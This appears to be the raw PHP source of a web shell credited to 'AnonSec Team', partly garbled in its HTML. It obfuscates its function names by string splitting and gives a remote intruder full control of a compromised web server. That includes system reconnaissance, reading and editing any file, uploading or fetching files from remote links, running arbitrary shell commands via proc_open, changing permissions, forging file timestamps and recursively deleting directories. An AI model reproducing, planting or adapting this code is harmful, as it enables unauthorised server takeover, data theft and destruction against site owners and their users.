<!DOCTYPE html>Mr".".F"."n4"."ti"."cH"."z Shell echo "<title>Mr".".F"."n4"."ti"."cH"."z Shell</title>"; <meta name="robots" content="noindex"> <link rel="icon" href="https://brebes-bx.biz.id/bbx.jpg" type="image/x-icon"><body bgcolor="#1f1f1f" text="#ffffff"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><style> @import url('https://fonts.googleapis.com/css?family=Dosis'); @import url('https://fonts.googleapis.com/css?family=Bungee'); @import url('https://fonts.googleapis.com/css?family=Russo+One');body { font-family: "Dosis", cursive; text-shadow:0px 0px 1px #757575;}body::-webkit-scrollbar { width: 12px;}body::-webkit-scrollbar-track { background: #1f1f1f;}body::-webkit-scrollbar-thumb { background-color: #1f1f1f; border: 3px solid gray;}#content tr:hover { background-color: #636263; text-shadow:0px 0px 10px #fff;}#content .first { background-color: #25383C;}#content .first:hover { background-color: #25383C text-shadow:0px 0px 1px #757575;}table { border: 1px #000000 dotted; table-layout: fixed;}td { word-wrap: break-word;}a { color: #ffffff; text-decoration: none;}a:hover { color: #000000; text-shadow:0px 0px 10px #ffffff;}input,select,textarea { border: 1px #000000 solid; -moz-border-radius: 5px; -webkit-border-radius:5px; border-radius:5px;}.gas { background-color: #1f1f1f; color: #ffffff; cursor: pointer;}select { background-color: transparent; color: #ffffff;}select:after { cursor: pointer;}.linka { background-color: transparent; color: #ffffff;}.up { background-color: transparent; color: #fff;}option { background-color: #1f1f1f;}.btf { background: transparent; border: 1px #fff solid; cursor: pointer;}::-webkit-file-upload-button { background: transparent; color: #fff; border-color: #fff; cursor: pointer;}</style>
echo '<font face="Bungee" size="5">Mr'.'.F'.'n4'.'ti'.'cH'.'z Shell</font>
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">';set_time_limit(0);error_reporting(0);$gcw = "ge"."tc"."wd";$exp = "ex"."plo"."de";$fpt = "fi"."le_p"."ut_co"."nte"."nts";$fgt = "f"."ile_g"."et_c"."onten"."ts";$sts = "s"."trip"."slash"."es";$scd = "sc"."a"."nd"."ir";$fxt = "fi"."le_"."exis"."ts";$idi = "i"."s_d"."ir";$ulk = "un"."li"."nk";$ifi = "i"."s_fi"."le";$sub = "subs"."tr";$spr = "sp"."ri"."ntf";$fp = "fil"."epe"."rms";$chm = "ch"."m"."od";$ocd = "oc"."td"."ec";$isw = "i"."s_wr"."itab"."le";$idr = "i"."s_d"."ir";$ird = "is"."_rea"."da"."ble";$isr = "is_"."re"."adab"."le";$fsz = "fi"."lesi"."ze";$rd = "r"."ou"."nd";$igt = "in"."i_g"."et";$fnct = "fu"."nc"."tion"."_exi"."sts";$rad = "RE"."M"."OTE_AD"."DR";$rpt = "re"."al"."pa"."th";$bsn = "ba"."se"."na"."me";$srl = "st"."r_r"."ep"."la"."ce";$sps = "st"."rp"."os";$mkd = "m"."kd"."ir";$wb = (isset($_SERVER['H'.'T'.'TP'.'S']) && $_SERVER['H'.'T'.'TP'.'S'] === 'o'.'n' ? "ht"."tp"."s" : "ht"."tp") . "://".$_SERVER['HT'.'TP'.'_H'.'OS'.'T'];$disfunc = @$igt("dis"."abl"."e_f"."unct"."ion"."s");if (empty($disfunc)) { $disf = "<font color='gold'>NONE</font>";} else { $disf = "<font color='red'>".$disfunc."</font>";}function author() { echo "

An"."on"."7 - 2"."02"."2
<a href='https://sh"."el"."l.an"."ons"."ec-te"."am.org/' target='_blank'>An"."on"."Se"."c Te"."am</a>
"; exit();}function cekdir() { if (isset($_GET['loknya'])) { $lokasi = $_GET['loknya']; } else { $lokasi = "ge"."t"."cw"."d"; $lokasi = $lokasi(); } $b = "i"."s_w"."ri"."tab"."le"; if ($b($lokasi)) { return "<font color='green'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; }}function crt() { $a = "is"."_w"."ri"."tab"."le"; if ($a($_SERVER['DO'.'CU'.'ME'.'NT'.'_RO'.'OT'])) { return "<font color='green'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; }}function xrd($lokena) { $a = "s"."ca"."nd"."ir"; $items = $a($lokena); foreach ($items as $item) { if ($item === '.' || $item === '..') { continue; } $b = "is"."_di"."r"; $loknya = $lokena.'/'.$item; if ($b($loknya)) { xrd($loknya); } else { $c = "u"."nl"."in"."k"; $c($loknya); } } $d = "rm"."di"."r"; $d($lokena);}function cfn($fl) { $a = "ba"."sena"."me"; $b = "pat"."hinf"."o"; $c = $b($a($fl), loknyaINFO_EXTENSION); if ($c == "zip") { return '<i class="fa fa-file-zip-o" style="color: #d6d4ce"></i>'; } elseif (preg_match("/jpeg|jpg|png|ico/im", $c)) { return '<i class="fa fa-file-image-o" style="color: #d6d4ce"></i>'; } elseif ($c == "txt") { return '<i class="fa fa-file-text-o" style="color: #d6d4ce"></i>'; } elseif ($c == "pdf") { return '<i class="fa fa-file-pdf-o" style="color: #d6d4ce"></i>'; } elseif ($c == "html") { return '<i class="fa fa-file-code-o" style="color: #d6d4ce"></i>'; } else { return '<i class="fa fa-file-o" style="color: #d6d4ce"></i>'; }}function ipsrv() { $a = "g"."eth"."ost"."byna"."me"; $b = "fun"."cti"."on_"."exis"."ts"; $c = "S"."ERVE"."R_AD"."DR"; $d = "SE"."RV"."ER_N"."AM"."E"; if ($b($a)) { return $a($_SERVER[$d]); } else { return $a($_SERVER[$c]); }}function ggr($fl) { $a = "fun"."cti"."on_"."exis"."ts"; $b = "po"."si"."x_ge"."tgr"."gid"; $c = "fi"."le"."gro"."up"; if ($a($b)) { if (!$a($c)) { return "?"; } $d = $b($c($fl)); if (empty($d)) { $e = $c($fl); if (empty($e)) { return "?"; } else { return $e; } } else { return $d['name']; } } elseif ($a($c)) { return $c($fl); } else { return "?"; }}function gor($fl) { $a = "fun"."cti"."on_"."exis"."ts"; $b = "po"."s"."ix_"."get"."pwu"."id"; $c = "fi"."le"."o"."wn"."er"; if ($a($b)) { if (!$a($c)) { return "?"; } $d = $b($c($fl)); if (empty($d)) { $e = $c($fl); if (empty($e)) { return "?"; } else { return $e; } } else { return $d['name']; } } elseif ($a($c)) { return $c($fl); } else { return "?"; }}function fdt($fl) { $a = "da"."te"; $b = "fil"."emt"."ime"; return $a("F d Y H:i:s", $b($fl));}function dunlut($fl) { $a = "fil"."e_exi"."sts"; $b = "ba"."sena"."me"; $c = "fi"."les"."ize"; $d = "read"."fi"."le"; if ($a($fl) && isset($fl)) { header('Con'.'tent-Descr'.'iption: Fi'.'le Tra'.'nsfer'); header("Conte'.'nt-Control:public"); header('Cont'.'ent-Type: a'.'pp'.'licat'.'ion/oc'.'tet-s'.'tream'); header('Cont'.'ent-Dis'.'posit'.'ion: at'.'tachm'.'ent; fi'.'lena'.'me="'.$b($fl).'"'); header('Exp'.'ires: 0'); header("Ex"."pired:0"); header('Cac'.'he-Cont'.'rol: must'.'-revali'.'date'); header("Cont"."ent-Tran"."sfer-Enc"."oding:bi"."nary"); header('Pra'.'gma: pub'.'lic'); header('Con'.'ten'.'t-Le'.'ngth: ' .$c($fl)); flush(); $d($fl); exit; } else { return "Fi"."le Not F"."ound !"; }}function komend($kom, $lk) { $x = "pr"."eg_"."mat"."ch"; $xx = "2".">"."&"."1"; if (!$x("/".$xx."/i", $kom)) { $kom = $kom." ".$xx; } $a = "fu"."ncti"."on_"."ex"."is"."ts"; $b = "p"."ro"."c_op"."en"; $c = "htm"."lspe"."cialc"."hars"; $d = "s"."trea"."m_g"."et_c"."ont"."ents"; if ($a($b)) { $ps = $b($kom, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $meki, $lk); return "<pre>".$c($d($meki[1]))."</pre>"; } else { return "pr"."oc"."_op"."en f"."unc"."tio"."n i"."s di"."sabl"."ed !"; }}function green($text) { echo "
<font color='green'>".$text."
</font>";}function red($text) { echo "
<font color='red'>".$text."
</font>";}function oren($text) { return "
<font color='orange'>".$text."
</font>";}function tuls($nm, $lk) { return "[ <a href='".$lk."'>".$nm."</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";}echo "Se"."rv"."er"." I"."P : <font color=gold>".ipsrv()."</font> &nbsp;/&nbsp; Yo"."ur I"."P : <font color=gold>".$_SERVER[$rad]."</font>
";echo "We"."b S"."erv"."er : <font color='gold'>".$_SERVER['SE'.'RV'.'ER_'.'SOF'.'TWA'.'RE']."</font>
";$unm = "ph"."p_u"."na"."me";echo "Sys"."tem : <font color='gold'>".@$unm()."</font>
";$gcu = "g"."et_"."curr"."ent"."_us"."er";$gmu = "g"."et"."my"."ui"."d";echo "Us"."er : <font color='gold'>".@$gcu()."&nbsp;</font>( <font color='gold'>".@$gmu()."</font>)
";$phv = "ph"."pve"."rsi"."on";echo "PH"."P V"."er"."sio"."n : <font color='gold'>".@$phv()."</font>
";echo "Dis"."abl"."e Fu"."nct"."ion : ".$disf."</font>
";echo "MySQL : ";if (@$fnct("my"."sql_co"."nne"."ct")) { echo "<font color=green>ON</font>";} else { echo "<font color=red>OFF</font>";}echo " &nbsp;|&nbsp; cURL : ";if (@$fnct("cu"."rl"."_in"."it")) { echo "<font color=green>ON</font>";} else { echo "<font color=red>OFF</font>";}echo " &nbsp;|&nbsp; WG"."ET : ";if (@$fxt("/"."us"."r/b"."in/w"."get")) { echo "<font color=green>ON</font>";} else { echo "<font color=red>OFF</font>";}echo " &nbsp;|&nbsp; Pe"."rl : ";if (@$fxt("/u"."sr/b"."in"."/pe"."rl")) { echo "<font color=green>ON</font>";} else { echo "<font color=red>OFF</font>";}echo " &nbsp;|&nbsp; Pyt"."ho"."n : ";if (@$fxt("/"."us"."r/b"."in/p"."ytho"."n2")) { echo "<font color=green>ON</font>";} else { echo "<font color=red>OFF</font>";}echo " &nbsp;|&nbsp; S"."u"."do : ";if (@$fxt("/"."us"."r/b"."in/s"."u"."d"."o")) { echo "<font color=green>ON</font>";} else { echo "<font color=red>OFF</font>";}echo " &nbsp;|&nbsp; Pk"."e"."x"."e"."c : ";if (@$fxt("/"."us"."r/b"."in/p"."k"."e"."x"."e"."c")) { echo "<font color=green>ON</font>";} else { echo "<font color=red>OFF</font>";}echo "
Di"."rect"."ory : &nbsp;";foreach($_POST as $key => $value){ $_POST[$key] = $sts($value);}if(isset($_GET['loknya'])){ $lokasi = $_GET['loknya']; $lokdua = $_GET['loknya'];} else { $lokasi = $gcw(); $lokdua = $gcw();}$lokasi = $srl('\\','/',$lokasi);$lokasis = $exp('/',$lokasi);$lokasinya = @$scd($lokasi);foreach($lokasis as $id => $lok){ if($lok == '' && $id == 0){ $a = true; echo '<a href="?loknya=/">/</a>'; continue; } if($lok == '') continue; echo '<a href="?loknya='; for($i=0;$i<=$id;$i++){ echo "$lokasis[$i]"; if($i != $id) echo "/";} echo '">'.$lok.'</a>/';}echo '
';if (isset($_POST['upwkwk'])) { if (isset($_POST['berkasnya'])) { if ($_POST['dirnya'] == "2") { $lokasi = $_SERVER['DOC'.'UME'.'NT_R'.'OOT']; } if (empty($_FILES['berkas']['name'])) { echo "<font color=orange>Fi"."le not Se"."lected !</font>

"; } else { $data = @$fpt($lokasi."/".$_FILES['berkas']['name'], @$fgt($_FILES['berkas']['tm'.'p_na'.'me'])); if ($fxt($lokasi."/".$_FILES['berkas']['name'])) { $fl = $lokasi."/".$_FILES['berkas']['name']; echo "Fi"."le Upl"."oa"."ded ! &nbsp;<font color='gold'><i>".$fl."</i></font>
"; if ($sps($lokasi, $_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T']) !== false) { $lwb = $srl($_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T'], $wb."/", $fl); echo "Li"."nk : <a href='".$lwb."'><font color='gold'>".$lwb."</font></a>
"; } echo "
"; } else { echo "<font color='red'>Fa"."ile"."d to Up"."lo"."ad !</font>

"; } } } elseif (isset($_POST['linknya'])) { if (empty($_POST['namalink'])) { echo "<font color=orange>Fi"."lename cannot be empty !</font>

"; } elseif (empty($_POST['darilink'])) { echo "<font color=orange>Link cannot be empty !</font>

"; } else { if ($_POST['dirnya'] == "2") { $lokasi = $_SERVER['DOC'.'UME'.'NT_R'.'OOT']; } $data = @$fpt($lokasi."/".$_POST['namalink'], @$fgt($_POST['darilink'])); if ($fxt($lokasi."/".$_POST['namalink'])) { $fl = $lokasi."/".$_POST['namalink']; echo "Fi"."le Uplo"."ade"."d ! &nbsp;<font color='gold'><i>".$fl."</i></font>
"; if ($sps($lokasi, $_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T']) !== false) { $lwb = $srl($_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T'], $wb."/", $fl); echo "Li"."nk : <a href='".$lwb."'><font color='gold'>".$lwb."</font></a>
"; } echo "
"; } else { echo "<font color='red'>Fa"."iled to Up"."lo"."ad !</font>

"; } } }}echo "Uplo"."ad Fi"."le : ";echo '
current_dir [ '.cekdir().' ]document_root [ '.crt().' ]

';echo '
Co'.'mm'.'an'.'d : >" class="up" style="cursor: pointer; border-color: #fff">
';echo "
";echo '<hr><center style="font-family: Russo One">';echo tuls("HOME", $_SERVER['SC'.'RIP'.'T_N'.'AME']);//echo tuls("HOME");echo "<hr>
";if (isset($_GET['lokasie'])) { echo "Current Fi"."le : ".$_GET['lokasie']; echo '<br/>'; echo "<pre>".htmlspecialchars($fgt($_GET['lokasie']))."</pre>"; author();} elseif (isset($_POST['loknya']) && $_POST['pilih'] == "hapus") { if ($idi($_POST['loknya']) && $fxt($_POST['loknya'])) { xrd($_POST['loknya']); if ($fxt($_POST['loknya'])) { red("Fai"."led to del"."ete Dir"."ec"."tory !"); } else { green("Del"."ete Dir"."ect"."ory Suc"."cess !"); } } elseif ($ifi($_POST['loknya']) && $fxt($_POST['loknya'])) { @$ulk($_POST['loknya']); if ($fxt($_POST['loknya'])) { red("Failed to Delete Fi"."le !"); } else { green("De"."le"."te Fi"."le Succ"."ess !"); } } else { red("Fi"."le / Dir"."ecto"."ry not Fo"."und !"); }} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { if (!isset($_POST['cemod'])) { if ($_POST['ty'.'pe'] == "fi"."le") { echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."
"; } else { echo "
D"."ir : ".htmlspecialchars($_POST['loknya'])."
"; } echo '
Pe'.'rmi'.'ss'.'ion : '; if ($_POST['ty'.'pe'] == "fi"."le") { echo '';; } else { echo '';; } echo '

'; } else { $cm = @$chm($_POST['loknya'], $ocd($_POST['perm'])); if ($cm == true) { green("Change Mod Success !"); if ($_POST['ty'.'pe'] == "fi"."le") { echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."
"; } else { echo "
D"."ir : ".htmlspecialchars($_POST['loknya'])."
"; } echo '
Pe'.'rmi'.'ss'.'ion : '; if ($_POST['ty'.'pe'] == "fi"."le") { echo '';; } else { echo '';; } echo '

'; } else { red("Change Mod Failed !"); if ($_POST['ty'.'pe'] == "fi"."le") { echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."
"; } else { echo "
D"."ir : ".htmlspecialchars($_POST['loknya'])."
"; } echo '
Pe'.'rmi'.'ss'.'ion : '; if ($_POST['ty'.'pe'] == "fi"."le") { echo '';; } else { echo '';; } echo '

'; } }} elseif (isset($_POST['loknya']) && $_POST['pilih'] == "ubahnama") { if (isset($_POST['gantin'])) { $namabaru = $_GET['loknya']."/".$_POST['newname']; $ceen = "re"."na"."me"; if (@$ceen($_POST['loknya'], $namabaru) === true) { green("Change Name Success"); if ($_POST['ty'.'pe'] == "fi"."le") { echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."
"; } else { echo "
D"."ir : ".htmlspecialchars($_POST['loknya'])."
"; } echo '
New Name : '; if ($_POST['ty'.'pe'] == "fi"."le") { echo '';; } else { echo '';; } echo '

'; } else { red("Change Name Failed"); } } else { if ($_POST['ty'.'pe'] == "fi"."le") { echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."
"; } else { echo "
D"."ir : ".htmlspecialchars($_POST['loknya'])."
"; } echo '
New Name : '; if ($_POST['ty'.'pe'] == "fi"."le") { echo '';; } else { echo '';; } echo '

'; }} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { if (isset($_POST['gasedit'])) { $edit = @$fpt($_POST['loknya'], $_POST['src']); if ($fgt($_POST['loknya']) == $_POST['src']) { green("Ed"."it Fi"."le Suc"."ce"."ss !"); } else { red("Ed"."it Fi"."le Fai"."led !"); } } echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."

"; echo '
<textarea cols=80 rows=20 name="src">'.htmlspecialchars($fgt($_POST['loknya'])).'</textarea>

';} elseif (isset($_POST['komends'])) { if (isset($_POST['komend'])) { if (isset($_GET['loknya'])) { $lk = $_GET['loknya']; } else { $lk = $gcw(); } $km = 'ko'.'me'.'nd'; echo $km($_POST['komend'], $lk); exit(); }} elseif (isset($_POST['loknya']) && $_POST['pilih'] == "ubahtanggal") { if (isset($_POST['tanggale'])) { $stt = "st"."rtot"."ime"; $tch = "t"."ou"."ch"; $tanggale = $stt($_POST['tanggal']); if (@$tch($_POST['loknya'], $tanggale) === true) { green("Change Da"."te Succ"."ess !"); $det = "da"."te"; $ftm = "fi"."le"."mti"."me"; $b = $det("d F Y H:i:s", $ftm($_POST['loknya'])); if ($_POST['ty'.'pe'] == "fi"."le") { echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."
"; } else { echo "
D"."ir : ".htmlspecialchars($_POST['loknya'])."
"; } echo '
New Da'.'te : '; if ($_POST['ty'.'pe'] == "fi"."le") { echo '';; } else { echo '';; } echo '

'; } else { red("Fai"."led to Cha"."nge Da"."te !"); } } else { $det = "da"."te"; $ftm = "fi"."le"."mti"."me"; $b = $det("d F Y H:i:s", $ftm($_POST['loknya'])); if ($_POST['ty'.'pe'] == "fi"."le") { echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."
"; } else { echo "
D"."ir : ".htmlspecialchars($_POST['loknya'])."
"; } echo '
New Da'.'te : '; if ($_POST['ty'.'pe'] == "fi"."le") { echo '';; } else { echo '';; } echo '

'; }} elseif (isset($_POST['loknya']) && $_POST['pilih'] == "dunlut") { $dunlute = $_POST['loknya']; if ($fxt($dunlute) && isset($dunlute)) { if ($ird($dunlute)) { dunlut($dunlute); } elseif ($idr($fl)) { red("That is Di"."rec"."tory, Not Fi"."le -_-"); } else { red("Fi"."le is Not Re"."adab"."le !"); } } else { red("Fi"."le Not Fo"."und !"); }} elseif (isset($_POST['loknya']) && $_POST['pilih'] == "fo"."ld"."er") { if ($isw("./") || $ird("./")) { $loke = $_POST['loknya']; if (isset($_POST['buatfolder'])) { $buatf = $mkd($loke."/".$_POST['fo'.'lde'.'rba'.'ru']); if ($buatf == true) { green("Folder ".htmlspecialchars($_POST['fo'.'lde'.'rba'.'ru'])." Created !"); echo '
Folder :

'; echo '
'; } else { red("Failed to Create folder !"); echo '
Folder :

'; echo '
'; } } else { echo '
Folder :

'; echo '
'; } }} elseif (isset($_POST['lok'.'nya']) && $_POST['pilih'] == "fi"."le") { if ($isw("./") || $isr("./")) { $loke = $_POST['lok'.'nya']; if (isset($_POST['buatfi'.'le'])) { $buatf = $fpt($loke."/".$_POST['fi'.'lebaru'], ""); if ($fxt($loke."/".$_POST['fi'.'lebaru'])) { green("File ".htmlspecialchars($_POST['fi'.'lebaru'])." Created !"); echo '
Filename :

'; echo '
'; } else { red("Failed to Create File !"); echo '
Filename :

'; echo '
'; } } else { echo '
Filename :

'; echo '
'; } }}echo '<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr class="first">
Las'.'t Mo'.'dif'.'ied
Owner / Group
';echo "";$euybrekw = $srl($bsn($lokasi), "", $lokasi);$euybrekw = $srl("//", "/", $euybrekw);echo "<i class='fa fa-folder' style='color: #ffe9a2'></i> <a href=\"?loknya=".$euybrekw."\">..</a>
".gor($euybrekw)." / ".ggr($euybrekw)."
";if($isw($euybrekw)) echo '<font color="green">';elseif(!$isr($euybrekw)) echo '<font color="red">';echo statusnya($euybrekw);if($isw($euybrekw) || !$isr($euybrekw)) echo '</font>';echo "
<input type=\"hidden\" name=\"type\" value=\"dir\"><input type=\"hidden\" name=\"name\" value=\"$ppkcina\"><input type=\"hidden\" name=\"loknya\" value=\"$lokasi/$ppkcina\"><button type='submit' class='btf' name='pilih' value='folder'><i class='fa fa-folder' style='color: #fff'></i></button><button type='submit' class='btf' name='pilih' value='file'><i class='fa fa-file' style='color: #fff'></i></button>
";echo "";foreach($lokasinya as $ppkcina){ $euybre = $lokasi."/".$ppkcina; $euybre = $srl("//", "/", $euybre); if(!$idi($euybre) || $ppkcina == '.' || $ppkcina == '..') continue; echo ""; echo "<i class='fa fa-folder' style='color: #ffe9a2'></i> <a href=\"?loknya=".$euybre."\">".$ppkcina."</a>
".gor($euybre)." / ".ggr($euybre)."
"; if($isw($euybre)) echo '<font color="green">'; elseif(!$isr($euybre)) echo '<font color="red">'; echo statusnya($euybre); if($isw($euybre) || !$isr($euybre)) echo '</font>'; echo "
<input type=\"hidden\" name=\"type\" value=\"dir\"> <input type=\"hidden\" name=\"name\" value=\"$ppkcina\"> <input type=\"hidden\" name=\"loknya\" value=\"$lokasi/$ppkcina\"> <button type='submit' class='btf' name='pilih' value='ubahnama'><i class='fa fa-pencil' style='color: #fff'></i></button> <button type='submit' class='btf' name='pilih' value='ubahtanggal'><i class='fa fa-calendar' style='color: #fff'></i></button> <button type='submit' class='btf' name='pilih' value='ubahmod'><i class='fa fa-gear' style='color: #fff'></i></button> <button type='submit' class='btf' name='pilih' value='hapus'><i class='fa fa-trash' style='color: #fff'></i></button>
";}echo '<tr class="first">';$skd = "10"."24";foreach($lokasinya as $mekicina) { $euybray = $lokasi."/".$mekicina; if(!$ifi("$lokasi/$mekicina")) continue; $size = $fsz("$lokasi/$mekicina")/$skd; $size = $rd($size,3); if($size >= $skd){ $size = $rd($size/$skd,2).' M'.'B';} else { $size = $size.' K'.'B';}echo "".cfn($euybray)." <a href=\"?lokasie=$lokasi/$mekicina&loknya=$lokasi\">$mekicina</a>
".gor($euybray)." / ".ggr($euybray)."
";if($isw("$lokasi/$mekicina")) echo '<font color="green">';elseif(!$isr("$lokasi/$mekicina")) echo '<font color="red">';echo statusnya("$lokasi/$mekicina");if($isw("$lokasi/$mekicina") || !$isr("$lokasi/$mekicina")) echo '</font>';echo "
<button type='submit' class='btf' name='pilih' value='edit'><i class='fa fa-edit' style='color: #fff'></i></button><button type='submit' class='btf' name='pilih' value='ubahnama'><i class='fa fa-pencil' style='color: #fff'></i></button><button type='submit' class='btf' name='pilih' value='ubahtanggal'><i class='fa fa-calendar' style='color: #fff'></i></button><button type='submit' class='btf' name='pilih' value='ubahmod'><i class='fa fa-gear' style='color: #fff'></i></button><button type='submit' class='btf' name='pilih' value='dunlut'><i class='fa fa-down"."load' style='color: #fff'></i></button><button type='submit' class='btf' name='pilih' value='hapus'><i class='fa fa-trash' style='color: #fff'></i></button><input type=\"hidden\" name=\"type\" value=\"fi"."le\"><input type=\"hidden\" name=\"name\" value=\"$mekicina\"><input type=\"hidden\" name=\"loknya\" value=\"$lokasi/$mekicina\">
";}echo '';author();function statusnya($fl){ $a = "sub"."st"."r"; $b = "s"."pri"."ntf"; $c = "fil"."eper"."ms";$izin = $a($b('%o', $c($fl)), -4);return $izin;}